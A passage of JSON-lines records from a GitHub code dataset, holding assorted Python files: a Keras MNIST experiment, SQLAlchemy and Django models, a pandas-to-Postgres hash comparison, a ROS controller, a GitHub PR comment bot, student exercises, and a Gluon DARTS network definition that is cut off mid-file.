+{"seq_id":"43232935355","text":"import tensorflow as tf\nfrom tensorflow.keras.datasets import mnist\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nprint(f\"Tensorflow module location: {tf.__file__}\")\nprint(f\"TensorFlow version: {tf.__version__}\")\n#tf.config.set_visible_devices([], 'GPU')\n\nnum_epochs = 5\nbatch_size = 128\nlayer_sizes = [8, 16, 32, 64, 128, 256, 512, 1024]\n\n(train_images, train_labels), (test_images, test_labels) = mnist.load_data()\n\n# Reshape the data into a 28*28 = 784 vector\ntrain_images = train_images.reshape((60000, 28*28))\ntest_images = test_images.reshape((10000, 28*28))\n\n# The image data ranges from 0 - 255 integers, so this\n# reformats it to floating point values between 0.0 and 1.0\ntrain_images = train_images.astype(\"float32\") / 255\ntest_images = test_images.astype(\"float32\") / 255\n\n# Do some hyperparameter tuning of layer size\nlayer_size_vs_accuracy = {}\nfor layer_size in layer_sizes:\n\tprint(f\"Fitting model with layer size: {layer_size}\")\n\t# Create a sequential model with one hidden layer of layer_size neurons\n\t# and one output layer of 10 digits for classifying digits 0 - 9\n\tmodel = keras.Sequential([\n\t\tlayers.Dense(layer_size, activation=\"relu\"),\n\t\tlayers.Dense(10, activation=\"softmax\")\n\t])\n\n\t# Compile the model tracking accuracy\n\tmodel.compile(\n\t\toptimizer=keras.optimizers.RMSprop(1e-2),\n\t\tloss=\"sparse_categorical_crossentropy\",\n\t\tmetrics=[\"accuracy\"]\n\t)\n\n\t# Effect of batch size\n\t# small batch size --> very slow, averaging and applying weights for each sample, each epoch, good result\n\t# batch_size == sample_size (train_images.shape[0]) --> very fast, averaging and applying weights only once per epoch, poor result\n\t# moderate batch size, such as 128 --> quick and approaches answer quickly, nice happy medium, good result\n\thistory = model.fit(\n\t\ttrain_images,\n\t\ttrain_labels,\n\t\tepochs=num_epochs,\n\t\tbatch_size=batch_size,\n\t\tvalidation_split=0.2\n\t)\n\tlayer_size_vs_accuracy[layer_size] = history.history\n\n# Summarize the results of the experiment\nfig = plt.figure()\nplt.title(\"Hidden layer size vs. 
model accuracy\")\nx = layer_sizes\ny = []\nfor layer_size in layer_size_vs_accuracy:\n\ty.append(layer_size_vs_accuracy[layer_size]['accuracy'][-1])\n\naccuracy_vs_layer_size_plot = plt.plot(x, y, color='red', marker='o')\nplt.show()\n","repo_name":"nathankrueger/tensorflow_examples","sub_path":"examples/mnist_perceptron.py","file_name":"mnist_perceptron.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19592905825","text":"from fastapi_users.db import SQLAlchemyBaseUserTable\nfrom sqlalchemy import Column, Integer, String, Table, ForeignKey, Numeric, UniqueConstraint\nfrom sqlalchemy.orm import relationship\n\nfrom src.database import Base\n\n\nusers_plats = Table(\n \"user_plant\",\n Base.metadata,\n Column(\"id\", Integer, primary_key=True),\n Column(\"user_id\", ForeignKey(\"user.id\")),\n Column(\"plant_id\", ForeignKey(\"plant.id\")),\n Column(\"amount\", Integer),\n UniqueConstraint('user_id', 'plant_id'),\n)\n\n\nclass User(SQLAlchemyBaseUserTable[int], Base):\n id = Column(Integer, primary_key=True)\n name = Column(String)\n wallet = Column(Numeric(precision=10, scale=2))\n\n plants = relationship(\"Plant\", secondary=users_plats, backref=\"users\")\n","repo_name":"davidkrivko/Garden","sub_path":"src/auth/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32521368716","text":"import pandas as pd\nfrom sqlalchemy import *\nimport hashlib\nimport numpy\nfrom psycopg2.extensions import register_adapter, AsIs\ndef adapt_numpy_int64(numpy_int64):\n return AsIs(numpy_int64)\n\nregister_adapter(numpy.int64, adapt_numpy_int64)\n\n\nengine = create_engine('postgresql://test_user:testtest@localhost/redcarpet')\nconnection = engine.connect()\nmeta = MetaData(bind=engine)\nm = hashlib.md5()\nzeta_wallet = Table('zeta_wallet', meta,\n Column('wallet_id', INTEGER, Sequence('wallet_id_seq'), primary_key=True),\n Column('DDate', TEXT, nullable=True),\n Column('From_to_party', TEXT, nullable=True),\n Column('Credit', FLOAT, nullable=True),\n Column('Debit', FLOAT, nullable=True),\n Column('Balance', FLOAT, nullable=True),\n Column('Bank_ref_txn_id', TEXT, nullable=True),\n Column('Load', FLOAT, nullable=True),\n Column('Key', TEXT, nullable=True),\n Column('Lender', TEXT, nullable=True),\n Column('Zeta_Order_Id', TEXT, nullable=True),\n Column('DMI_User_bal', FLOAT, nullable=True),\n Column('RC_User_bal', FLOAT, nullable=True),\n Column('DMI_usr_bal_post_may', FLOAT, nullable=True),\n Column('Chandan_comment', TEXT, nullable=True),\n Column('Current_date', TEXT, nullable=True),\n Column('Status', TEXT, nullable=True),\n Column('Unnamed_col1', FLOAT, nullable=True),\n Column('Unnamed_col2', FLOAT, nullable=True),\n Column('Unnamed_col3', FLOAT, nullable=True),\n Column('Unnamed_col4', FLOAT, nullable=True),\n Column('Unnamed_col5', FLOAT, nullable=True),\n Column('Unnamed_col6', FLOAT, nullable=True),\n Column('Unnamed_col7', FLOAT, nullable=True),\n Column('Unnamed_col8', FLOAT, nullable=True),\n Column('Unnamed_col9', FLOAT, nullable=True),\n Column('Actual_bal', FLOAT, nullable=True),\n Column('Data_status',TEXT, nullable=True),\n Column('data_hash', TEXT, nullable=False))\n\nengine = create_engine('postgresql://test_user:testtest@localhost/redcarpet')\nconnection = engine.connect()\n\ndf1 = 
pd.read_csv('/home/saxena/PycharmProjects/test1/Tests/Zeta_Wallet_Loads_Zeta_Loads_mod.csv')\n\nif engine.has_table('zeta_wallet') is False:\n zeta_wallet.create()\n ins = zeta_wallet.insert()\n for tup in df1.itertuples():\n hash_obj = ''\n for i in range(1, len(df1.columns)+1):\n\n hash_obj += str(tup[i])\n hash_code = hashlib.md5(hash_obj.encode()).hexdigest()\n engine.execute(zeta_wallet.insert(), DDate=tup[1], From_to_party=tup[2], Credit=tup[3], Debit=tup[4],\n Balance=tup[5], Bank_ref_txn_id=tup[6], Load=tup[7], Key=tup[8], Lender=tup[9],\n Zeta_Order_Id=tup[10], DMI_User_bal=tup[11], RC_User_bal=tup[12], DMI_usr_bal_post_may=tup[13],\n Chandan_comment=tup[14], Current_date=tup[15], Status=tup[16], Unnamed_col1=tup[17],\n Unnamed_col2=tup[18], Unnamed_col3=tup[19], Unnamed_col4=tup[20], Unnamed_col5=tup[21],\n Unnamed_col6=tup[22], Unnamed_col7=tup[23], Unnamed_col8=tup[24], Unnamed_col9=tup[25],\n Actual_bal=tup[26], Data_status='NEW', data_hash=hash_code)\n\ndf2 = pd.read_sql_table('zeta_wallet', engine)\n\nhash_df1 = []\nfor tup in df1.itertuples():\n hash_obj = ''\n for i in range(1, len(df1.columns) + 1):\n hash_obj += str(tup[i])\n hash_code = hashlib.md5(hash_obj.encode()).hexdigest()\n hash_df1.append(hash_code)\n\ndf2_hash = pd.DataFrame(df2['data_hash'].copy())\ndf1_hash = pd.DataFrame(hash_df1)\nfor j, row in enumerate(df2_hash.itertuples()):\n for k, cow in enumerate(df1_hash.itertuples()):\n flag = 0\n if row[1] == cow[1]:\n df2.set_value(j, 'Data_status', 'DELETED')\n break\n\nval = df2.loc[df2['Data_status'] == 'DELETED', 'wallet_id'].values\n#tmp = df2.loc[df2['Data_status'] == 'NEW', 'wallet_id'].values\nstmt = zeta_wallet.update().where(zeta_wallet.c.wallet_id == bindparam('wlt_id')).values(Data_status='DELETED')\nst = []\nfor i in val:\n st.append({'wlt_id': i})\nconnection.execute(stmt, st)\nins = zeta_wallet.insert()\nfor tup in df1.itertuples():\n hash_obj = ''\n for i in range(1, len(df1.columns) + 1):\n hash_obj += str(tup[i])\n hash_code = hashlib.md5(hash_obj.encode()).hexdigest()\n engine.execute(zeta_wallet.insert(), DDate=tup[1], From_to_party=tup[2], Credit=tup[3], Debit=tup[4],\n Balance=tup[5], Bank_ref_txn_id=tup[6], Load=tup[7], Key=tup[8], Lender=tup[9],\n Zeta_Order_Id=tup[10], DMI_User_bal=tup[11], RC_User_bal=tup[12], DMI_usr_bal_post_may=tup[13],\n Chandan_comment=tup[14], Current_date=tup[15], Status=tup[16], Unnamed_col1=tup[17],\n Unnamed_col2=tup[18], Unnamed_col3=tup[19], Unnamed_col4=tup[20], Unnamed_col5=tup[21],\n Unnamed_col6=tup[22], Unnamed_col7=tup[23], Unnamed_col8=tup[24], Unnamed_col9=tup[25],\n Actual_bal=tup[26], Data_status='NEW', data_hash=hash_code)\n\nconnection.close()","repo_name":"pulkitsaxena14/rc_test","sub_path":"hash_compare.py","file_name":"hash_compare.py","file_ext":"py","file_size_in_byte":5436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3785188255","text":"from django import forms\n\nfrom pages.models import Produto, DoacaoAgendada\n\nclass AgendamentoForm(forms.ModelForm):\n\n class Meta:\n model = DoacaoAgendada\n fields = ('produto', 'quantidade', )\n\n\n def __init__(self, *args, **kwargs):\n\n super(AgendamentoForm, self).__init__(*args, **kwargs)\n \n self.fields['quantidade'].widget.attrs['readonly'] = 'readonly'\n \n initial = kwargs.get('initial')\n grupoProduto = initial.get('grupoProduto')\n \n self.fields['produto'].queryset = Produto.objects.filter(\n grupoProduto=grupoProduto,\n aceitaDoacao=True\n 
)\n","repo_name":"celsorv/cesta","sub_path":"doacao/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"pt","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"19504504937","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n# license removed for brevity\nimport rospy, signal, sys, readchar\nimport tty, termios, select\nfrom std_msgs.msg import String\n\nlastchoice = ''\n\ndef sigint_callback():\n rospy.signal_shutdown(\"Ctrl+C detected\")\n sys.exit(0)\n\n\ndef controller():\n global lastchoice\n\n choice = readchar.readkey()\n\n # SIGINT handler\n if choice == '\\x03':\n sigint_callback()\n\n if choice in \"CANEenac\":\n choice = choice.lower()\n if choice != lastchoice:\n rospy.loginfo(\"HAI SELEZIONATO %s\" % choice)\n lastchoice = choice\n\n pub.publish(choice)\n\n\nif __name__ == '__main__':\n pub = rospy.Publisher('controller', String, queue_size=10)\n rospy.init_node('controller', anonymous=True)\n\n string = \"\"\"\\n\\r\nDigita la tua scelta:\\n\\r\n- 'a': stampa tutti i dati\n- 'n': stampa il nome dello studente\n- 'e': stampa l'età dello studente\n- 'c': stampa il corso di laurea dello studente\\n\\r\nCtrl+C per terminare\n \"\"\"\n\n rospy.loginfo(string)\n\n while True:\n controller()\n","repo_name":"BAnd313/homework1","sub_path":"src/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27147193151","text":"# coding: utf-8\n\"\"\"\nCenters of mass of water molecule\n\"\"\"\n\nimport numpy as np\nfrom logging import getLogger\nfrom genice2.decorators import timeit, banner\nimport genice2.formats\n\n\nclass Format(genice2.formats.Format):\n \"\"\"\nCenters-of-mass of water molecules are output in @AR3A format.\nNo options available.\n \"\"\"\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n def hooks(self):\n return {1: self.Hook1}\n\n @timeit\n @banner\n def Hook1(self, ice):\n \"Output centers of mass of water molecules.\"\n logger = getLogger()\n cellmat = ice.repcell.mat\n s = \"\"\n if cellmat[1, 0] == 0 and cellmat[2, 0] == 0 and cellmat[2, 1] == 0:\n s += \"@BOX3\\n\"\n s += \"{0} {1} {2}\\n\".format(cellmat[0, 0] *\n 10, cellmat[1, 1] * 10, cellmat[2, 2] * 10)\n else:\n s += \"@BOX9\\n\"\n for d in range(3):\n s += \"{0} {1} {2}\\n\".format(cellmat[0, d] *\n 10, cellmat[1, d] * 10, cellmat[2, d] * 10)\n s += \"@AR3A\\n\"\n s += \"{0}\\n\".format(len(ice.reppositions))\n for pos in ice.reppositions:\n position = pos @ cellmat * 10 # in Angstrom\n s += \"{0:9.4f} {1:9.4f} {2:9.4f}\\n\".format(position[0],\n position[1],\n position[2])\n s = \"\\n\".join(ice.doc) + \"\\n\" + s\n self.output = s\n","repo_name":"vitroid/GenIce","sub_path":"genice2/formats/com.py","file_name":"com.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"37"} +{"seq_id":"31947783285","text":"# Python\nimport os\n\n# Database\nfrom database import SessionLocal\nfrom database.queries import get_row, write_row\n\n\ndef check_root(root_user: dict):\n db = SessionLocal()\n root = get_row(db, \"Trader\", username=root_user[\"username\"])\n if root is None:\n root = write_row(db, \"Trader\", with_dict=root_user)\n print(f\"Superuser created: {root.username}\")\n print(\"Welcome to OTI\")\n db.close()\n\n\ndef create_directories(directories: list):\n for dir in directories:\n 
os.makedirs(dir, exist_ok=True)\n","repo_name":"josdanind/OTI-Algorithmic-Trading","sub_path":"services/api/utils/starting_server.py","file_name":"starting_server.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15260537757","text":"import json\r\nimport requests\r\n\r\n# Authentication info\r\n\r\nwith open('./input/authParams.txt') as f:\r\n USERNAME, TOKEN = f.read().splitlines()\r\n\r\n# The repository to add this issue to\r\n\r\nwith open('./input/prParams.txt') as f:\r\n REPO_NAME, REPO_OWNER, PR_NUMBER = f.read().splitlines()\r\n PR_NUMBER = int(PR_NUMBER, 10)\r\n\r\ndef make_github_comment(body=None):\r\n '''Create a comment on github.com using the given parameters.'''\r\n # Our url to create comments via POST\r\n url = 'https://api.github.com/repos/%s/%s/issues/%i/comments' % (REPO_OWNER, REPO_NAME, PR_NUMBER)\r\n # Create an authenticated session to create the comment\r\n headers = {\r\n \"Authorization\": \"token %s\" % TOKEN,\r\n }\r\n # Create our comment\r\n data = {'body': body}\r\n\r\n r = requests.post(url, json.dumps(data), headers=headers)\r\n if r.status_code == 201:\r\n print('Successfully created comment \"%s\"' % body)\r\n else:\r\n print('Could not create comment \"%s\"' % body)\r\n print('Response:', r.content)\r\n\r\nmake_github_comment(\"\"\"__Hi there! This pull request looks like it might be a duplicate of #2.__\r\n\r\nPlease help us out by clicking one of the options below:\r\n- This comment was [__useful__](https://pages.github.com/).\r\n- This pull request is __not a duplicate__, so this comment was [__not useful__](https://pages.github.com/).\r\n- I do not need this service, so this comment was [__not useful__](https://pages.github.com/).\r\n \"\"\")\r\n","repo_name":"dupbot/test-repo","sub_path":"PRcommenter.py","file_name":"PRcommenter.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74535883627","text":"import string\r\nchar_list = []\r\ncount_char = 0\r\ncount_char_for_first = 0\r\ncount_char_for_sec = 0\r\ncount_char_for_th = 0\r\nchar_num = int(input(\"enter char numbers: \"))\r\nif(char_num >= 1 and char_num <= 4):\r\n for i in range(0, char_num):\r\n char = input(\"enter char: \")\r\n char_list.append(char)\r\n\r\n print(char_list)\r\n \r\n for i in char_list:\r\n if(isinstance(i, str)):\r\n if(char_num == 1):\r\n if(i in string.ascii_lowercase):\r\n sen = \"This sentence contains \"+i+\"'s\"\r\n print(sen)\r\n for j in sen:\r\n if(i == j):\r\n count_char += 1\r\n print(i+\":\"+str(count_char))\r\n new_sen = \"This sentence contains \"+str(count_char)+\" \"+i+\"'s\"\r\n print(new_sen)\r\n elif(char_num == 2):\r\n if(i in string.ascii_lowercase):\r\n sen2 = \"This sentence contains \"+i+\"'s and \"+char_list[char_list.index(i)+1]+\"'s\"\r\n print(sen2)\r\n for j in sen2:\r\n if(i == j):\r\n count_char_for_first += 1\r\n elif(char_list[char_list.index(i)+1] == j):\r\n count_char_for_sec += 1\r\n print(count_char_for_first)\r\n print(count_char_for_sec)\r\n new_sen1 = \"This sentence contains \"+str(count_char_for_first)+\" \"+i+\"'s and \"+str(count_char_for_sec)+\" \"+char_list[char_list.index(i)+1]+\"'s\"\r\n print(new_sen1)\r\n elif(char_num == 3):\r\n if(i in string.ascii_lowercase):\r\n sen3 = \"This sentence contains \"+i+\"'s and \"+char_list[char_list.index(i)+1]+\"'s and \"+char_list[char_list.index(i)+2]+\"'s\"\r\n print(sen3)\r\n for j in sen3:\r\n if(i == j):\r\n count_char_for_first += 1\r\n elif(char_list[char_list.index(i)+1] == j):\r\n count_char_for_sec += 1\r\n elif(char_list[char_list.index(i)+2] == j):\r\n count_char_for_th += 1\r\n print(count_char_for_first)\r\n print(count_char_for_sec)\r\n print(count_char_for_th)\r\n new_sen2 = \"This sentence contains \"+str(count_char_for_first)+\" \"+i+\"'s and \"+str(count_char_for_sec)+\" \"+char_list[char_list.index(i)+1]+\"'s and \"+str(count_char_for_th)+\" \"+char_list[char_list.index(i)+2]+\"'s\"\r\n print(new_sen2)\r\n '''if(check_num == 1):\r\n sen = \"This sentence contains two\"+i+\"'s.\"\r\n if(i in sen == True):\r\n count_char = count_char + 1\r\n print(count_char)\r\n elif(check_num == 2):\r\n sen = \"This sentence contains three\"+i+\"'s and three \"+char_list[index(i)+1]+\"'s OR This sentence contains three a's and two r's.\"\r\n if(i in sen == True and char_list[index(i)+1] in sen == True):\r\n count_char = count_char + 1\r\n count_char = count_char + 1\r\n print(count_char)\r\n print(count_char2)\r\n elif(check_num == 3):\r\n sen = \"This sentence contains one\"+i+\", one \"+char_list[index(i)+1]+\" and one \"+char_list[index(i)+2]+\".\"\r\n if(i in sen == True and char_list[index(i)+1] in sen == True and char_list[index(i)+2] in sen == True):\r\n count_char = count_char + 1\r\n count_char2 = count_char2 + 1\r\n count_char3 = count_char3 + 1\r\n print(count_char)\r\n print(count_char2)\r\n print(count_char3)'''\r\nelse:\r\n print(\"enter valid number\")\r\n","repo_name":"hmake98/codevita-round1-2018-C","sub_path":"Syntax.py","file_name":"Syntax.py","file_ext":"py","file_size_in_byte":4057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24649439287","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef Task_7():\n arr = np.array(np.random.randint(0,2,(10,10)))\n fig, axs = plt.subplots(2,2, figsize=(10,10))\n\n axs[0, 0].imshow(arr)\n axs[0, 0].set_title('Исходное изображение')\n\n newArr = np.array(arr[3:7, 3:7])\n axs[0, 1].imshow(newArr)\n axs[0, 1].set_title('Центр. 
часть (4х4)')\n\n invArr = np.array(1 - arr)\n axs[1, 0].imshow(invArr)\n axs[1, 0].set_title('Инвертированное изображение')\n\n Arr1 = []\n for i in range(len(arr)):\n Arr2 = []\n for j in range(len(arr[i])-1):\n if(j == 0):\n continue\n elif(j == len(arr[i])):\n break\n else:\n Arr2.append((arr[i,j-1]+arr[i,j]+arr[i,j+1])/3)\n Arr1.append(Arr2)\n\n blurryArr = np.array(Arr1)\n axs[1,1].imshow(blurryArr)\n axs[1, 1].set_title('Размытое изображение')\n plt.show()\n fig.savefig('images_matplotlib.png')","repo_name":"Meggi9/Learn_NumPy_Matplotlib","sub_path":"Task_7.py","file_name":"Task_7.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18676113986","text":"\"\"\"\n DARTS for ImageNet-1K, implemented in Gluon.\n Original paper: 'DARTS: Differentiable Architecture Search,' https://arxiv.org/abs/1806.09055.\n\"\"\"\n\n__all__ = ['DARTS', 'darts']\n\nimport os\nfrom mxnet import cpu\nfrom mxnet.gluon import nn, HybridBlock\nfrom mxnet.gluon.contrib.nn import Identity\nfrom .common import conv1x1\nfrom .nasnet import nasnet_dual_path_sequential\n\n\nclass DwsConv(HybridBlock):\n \"\"\"\n Standard dilated depthwise separable convolution block with.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n out_channels : int\n Number of output channels.\n kernel_size : int or tuple/list of 2 int\n Convolution window size.\n strides : int or tuple/list of 2 int\n Strides of the convolution.\n padding : int or tuple/list of 2 int\n Padding value for convolution layer.\n dilation : int or tuple/list of 2 int\n Dilation value for convolution layer.\n use_bias : bool, default False\n Whether the layers use a bias vector.\n \"\"\"\n def __init__(self,\n in_channels,\n out_channels,\n kernel_size,\n strides,\n padding,\n dilation,\n use_bias=False,\n **kwargs):\n super(DwsConv, self).__init__(**kwargs)\n with self.name_scope():\n self.dw_conv = nn.Conv2D(\n channels=in_channels,\n kernel_size=kernel_size,\n strides=strides,\n padding=padding,\n dilation=dilation,\n groups=in_channels,\n use_bias=use_bias,\n in_channels=in_channels)\n self.pw_conv = conv1x1(\n in_channels=in_channels,\n out_channels=out_channels,\n use_bias=use_bias)\n\n def hybrid_forward(self, F, x):\n x = self.dw_conv(x)\n x = self.pw_conv(x)\n return x\n\n\nclass DartsConv(HybridBlock):\n \"\"\"\n DARTS specific convolution block.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n out_channels : int\n Number of output channels.\n kernel_size : int or tuple/list of 2 int\n Convolution window size.\n strides : int or tuple/list of 2 int\n Strides of the convolution.\n padding : int or tuple/list of 2 int\n Padding value for convolution layer.\n activate : bool, default True\n Whether activate the convolution block.\n \"\"\"\n def __init__(self,\n in_channels,\n out_channels,\n kernel_size,\n strides,\n padding,\n activate=True,\n **kwargs):\n super(DartsConv, self).__init__(**kwargs)\n self.activate = activate\n\n with self.name_scope():\n if self.activate:\n self.activ = nn.Activation(\"relu\")\n self.conv = nn.Conv2D(\n channels=out_channels,\n kernel_size=kernel_size,\n strides=strides,\n padding=padding,\n use_bias=False,\n in_channels=in_channels)\n self.bn = nn.BatchNorm(in_channels=out_channels)\n\n def hybrid_forward(self, F, x):\n if self.activate:\n x = self.activ(x)\n x = self.conv(x)\n x = self.bn(x)\n return x\n\n\ndef darts_conv1x1(in_channels,\n out_channels,\n 
activate=True):\n \"\"\"\n 1x1 version of the DARTS specific convolution block.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n out_channels : int\n Number of output channels.\n activate : bool, default True\n Whether activate the convolution block.\n \"\"\"\n return DartsConv(\n in_channels=in_channels,\n out_channels=out_channels,\n kernel_size=1,\n strides=1,\n padding=0,\n activate=activate)\n\n\ndef darts_conv3x3_s2(in_channels,\n out_channels,\n activate=True):\n \"\"\"\n 3x3 version of the DARTS specific convolution block with stride 2.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n out_channels : int\n Number of output channels.\n activate : bool, default True\n Whether activate the convolution block.\n \"\"\"\n return DartsConv(\n in_channels=in_channels,\n out_channels=out_channels,\n kernel_size=3,\n strides=2,\n padding=1,\n activate=activate)\n\n\nclass DartsDwsConv(HybridBlock):\n \"\"\"\n DARTS specific dilated convolution block.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n out_channels : int\n Number of output channels.\n kernel_size : int or tuple/list of 2 int\n Convolution window size.\n strides : int or tuple/list of 2 int\n Strides of the convolution.\n padding : int or tuple/list of 2 int\n Padding value for convolution layer.\n dilation : int or tuple/list of 2 int\n Dilation value for convolution layer.\n \"\"\"\n def __init__(self,\n in_channels,\n out_channels,\n kernel_size,\n strides,\n padding,\n dilation,\n **kwargs):\n super(DartsDwsConv, self).__init__(**kwargs)\n with self.name_scope():\n self.activ = nn.Activation(\"relu\")\n self.conv = DwsConv(\n in_channels=in_channels,\n out_channels=out_channels,\n kernel_size=kernel_size,\n strides=strides,\n padding=padding,\n dilation=dilation,\n use_bias=False)\n self.bn = nn.BatchNorm(in_channels=out_channels)\n\n def hybrid_forward(self, F, x):\n x = self.activ(x)\n x = self.conv(x)\n x = self.bn(x)\n return x\n\n\nclass DartsDwsBranch(HybridBlock):\n \"\"\"\n DARTS specific block with depthwise separable convolution layers.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n out_channels : int\n Number of output channels.\n kernel_size : int or tuple/list of 2 int\n Convolution window size.\n strides : int or tuple/list of 2 int\n Strides of the convolution.\n padding : int or tuple/list of 2 int\n Padding value for convolution layer.\n \"\"\"\n def __init__(self,\n in_channels,\n out_channels,\n kernel_size,\n strides,\n padding,\n **kwargs):\n super(DartsDwsBranch, self).__init__(**kwargs)\n mid_channels = in_channels\n\n with self.name_scope():\n self.conv1 = DartsDwsConv(\n in_channels=in_channels,\n out_channels=mid_channels,\n kernel_size=kernel_size,\n strides=strides,\n padding=padding,\n dilation=1)\n self.conv2 = DartsDwsConv(\n in_channels=mid_channels,\n out_channels=out_channels,\n kernel_size=kernel_size,\n strides=1,\n padding=padding,\n dilation=1)\n\n def hybrid_forward(self, F, x):\n x = self.conv1(x)\n x = self.conv2(x)\n return x\n\n\nclass DartsReduceBranch(HybridBlock):\n \"\"\"\n DARTS specific factorized reduce block.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n out_channels : int\n Number of output channels.\n strides : int or tuple/list of 2 int, default 2\n Strides of the convolution.\n \"\"\"\n def __init__(self,\n in_channels,\n out_channels,\n strides=2,\n **kwargs):\n super(DartsReduceBranch, self).__init__(**kwargs)\n assert 
(out_channels % 2 == 0)\n mid_channels = out_channels // 2\n\n with self.name_scope():\n self.activ = nn.Activation(\"relu\")\n self.conv1 = conv1x1(\n in_channels=in_channels,\n out_channels=mid_channels,\n strides=strides)\n self.conv2 = conv1x1(\n in_channels=in_channels,\n out_channels=mid_channels,\n strides=strides)\n self.bn = nn.BatchNorm(in_channels=out_channels)\n\n def hybrid_forward(self, F, x):\n x = self.activ(x)\n x1 = self.conv1(x)\n x = F.slice(x, begin=(None, None, 1, 1), end=(None, None, None, None))\n x2 = self.conv2(x)\n x = F.concat(x1, x2, dim=1)\n x = self.bn(x)\n return x\n\n\nclass Stem1Unit(HybridBlock):\n \"\"\"\n DARTS Stem1 unit.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n out_channels : int\n Number of output channels.\n \"\"\"\n def __init__(self,\n in_channels,\n out_channels,\n **kwargs):\n super(Stem1Unit, self).__init__(**kwargs)\n mid_channels = out_channels // 2\n\n with self.name_scope():\n self.conv1 = darts_conv3x3_s2(\n in_channels=in_channels,\n out_channels=mid_channels,\n activate=False)\n self.conv2 = darts_conv3x3_s2(\n in_channels=mid_channels,\n out_channels=out_channels,\n activate=True)\n\n def hybrid_forward(self, F, x):\n x = self.conv1(x)\n x = self.conv2(x)\n return x\n\n\ndef stem2_unit(in_channels,\n out_channels):\n \"\"\"\n DARTS Stem2 unit.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n out_channels : int\n Number of output channels.\n \"\"\"\n return darts_conv3x3_s2(\n in_channels=in_channels,\n out_channels=out_channels,\n activate=True)\n\n\ndef darts_maxpool3x3(channels,\n strides):\n \"\"\"\n DARTS specific 3x3 Max pooling layer.\n\n Parameters:\n ----------\n channels : int\n Number of input/output channels. Unused parameter.\n strides : int or tuple/list of 2 int\n Strides of the convolution.\n \"\"\"\n assert (channels > 0)\n return nn.MaxPool2D(\n pool_size=3,\n strides=strides,\n padding=1)\n\n\ndef darts_skip_connection(channels,\n strides):\n \"\"\"\n DARTS specific skip connection layer.\n\n Parameters:\n ----------\n channels : int\n Number of input/output channels.\n strides : int or tuple/list of 2 int\n Strides of the convolution.\n \"\"\"\n assert (channels > 0)\n if strides == 1:\n return Identity()\n else:\n assert (strides == 2)\n return DartsReduceBranch(\n in_channels=channels,\n out_channels=channels,\n strides=strides)\n\n\ndef darts_dws_conv3x3(channels,\n strides):\n \"\"\"\n 3x3 version of DARTS specific dilated convolution block.\n\n Parameters:\n ----------\n channels : int\n Number of input/output channels.\n strides : int or tuple/list of 2 int\n Strides of the convolution.\n \"\"\"\n return DartsDwsConv(\n in_channels=channels,\n out_channels=channels,\n kernel_size=3,\n strides=strides,\n padding=2,\n dilation=2)\n\n\ndef darts_dws_branch3x3(channels,\n strides):\n \"\"\"\n 3x3 version of DARTS specific dilated convolution branch.\n\n Parameters:\n ----------\n channels : int\n Number of input/output channels.\n strides : int or tuple/list of 2 int\n Strides of the convolution.\n \"\"\"\n return DartsDwsBranch(\n in_channels=channels,\n out_channels=channels,\n kernel_size=3,\n strides=strides,\n padding=1)\n\n\n# Set of operations in genotype.\nGENOTYPE_OPS = {\n 'max_pool_3x3': darts_maxpool3x3,\n 'skip_connect': darts_skip_connection,\n 'dil_conv_3x3': darts_dws_conv3x3,\n 'sep_conv_3x3': darts_dws_branch3x3,\n}\n\n\nclass DartsMainBlock(HybridBlock):\n \"\"\"\n DARTS main block, described by genotype.\n\n Parameters:\n 
----------\n genotype : list of tuples (str, int)\n List of genotype elements (operations and linked indices).\n channels : int\n Number of input/output channels.\n reduction : bool\n Whether use reduction.\n \"\"\"\n def __init__(self,\n genotype,\n channels,\n reduction,\n **kwargs):\n super(DartsMainBlock, self).__init__(**kwargs)\n self.concat = [2, 3, 4, 5]\n op_names, indices = zip(*genotype)\n self.indices = indices\n self.steps = len(op_names) // 2\n\n with self.name_scope():\n for i, (name, index) in enumerate(zip(op_names, indices)):\n stride = 2 if reduction and index < 2 else 1\n setattr(self, \"ops{}\".format(i + 1), GENOTYPE_OPS[name](channels, stride))\n\n def hybrid_forward(self, F, x, x_prev):\n s0 = x_prev\n s1 = x\n states = [s0, s1]\n for i in range(self.steps):\n j1 = 2 * i\n j2 = 2 * i + 1\n op1 = getattr(self, \"ops{}\".format(j1 + 1))\n op2 = getattr(self, \"ops{}\".format(j2 + 1))\n y1 = states[self.indices[j1]]\n y2 = states[self.indices[j2]]\n y1 = op1(y1)\n y2 = 